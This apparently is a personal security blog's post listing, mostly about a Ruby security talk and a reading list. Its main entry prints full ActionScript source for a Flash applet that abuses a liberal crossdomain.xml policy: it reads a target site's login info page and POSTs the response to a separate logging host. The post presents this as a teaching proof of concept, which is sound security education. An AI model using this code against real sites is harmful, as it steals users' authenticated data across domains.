Posts

    Ruby and Security Presentation

    January 26, 2015

    So, last week I presented ot the Indy OWASP Chapter about a topic near and dear to my heart- ruby and security. I really had a great time creating and giving the presentation and hope to expand it for a future talk.

    If you liked this post, you can share it with your followers or follow me on Twitter!

    Recommended Security Reading List Link

    September 3, 2014

    Those of you that know me know that books are my vice. I have a ton of books. I have them at my house, in my car, at my office, etc. I have paperbacks, hardbacks, and e-books. I’ve recently started bringing in a few to work each day in order to reduce clutter at my house.

    Anyway…

    I stumbled across this reading list -> http://dfir.org/?q=node/8 which is a great list by @attrc that breaks down books by subject and skill level. If you are looking for good books on security, this is definitely something to check out. And if you live near me, ping me and I most likely have them if you would like to borrow. :)

    Liberal Crossdomain.xml Example- Part 2

    August 12, 2014

    As a followup to Liberal Crossdomain.xml Exploit Example – Part 1, this is the source for the Flash app.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    package {
     import flash.display.Sprite;
     import flash.events.*;
     import flash.net.URLRequestMethod;
     import flash.net.URLRequest;
     import flash.net.URLLoader;
     
     public class flasher extends Sprite {
      public function flasher() {
       // Target URL from where the data is to be retrieved
       var readFrom:String = "http://rubysecurity.info/login/info.php";
       var readRequest:URLRequest = new URLRequest(readFrom);
       var getLoader:URLLoader = new URLLoader();
       getLoader.addEventListener(Event.COMPLETE, eventHandler);
       try
       {
        getLoader.load(readRequest);
       }
       catch (error:Error)
       {
       }
      }
     
      private function eventHandler(event:Event):void
      {
       // URL to which retrieved data is to be sent
       var sendTo:String = "http://injectionvector.com/flasher/log.php"
       var sendRequest:URLRequest = new URLRequest(sendTo);
       sendRequest.method = URLRequestMethod.POST;
       sendRequest.data = event.target.data;
       var sendLoader:URLLoader = new URLLoader();
       try
       {
        sendLoader.load(sendRequest);
       }
       catch (error:Error)
       {
       }
      }
     }
    }

    It’s really a fairly simple Flash applet. The class is called flasher and extends Sprite. Sprite is a base class for UI components that don’t use the timeline. In the constructor it creates a URLRequest object to data from the location specified in the readFrom variable via a URLLoader object. It then sets an event handler, called eventhandler, that is called when that read is done. When the read is done, it then basically does the same thing, but posts to the variable specified in sendTo and sets the body of the request to be the data received from the first step.

    Note: This is based off an example that I found, but have misplaced. Once found, I will update the post to reference it.

subscribe via RSS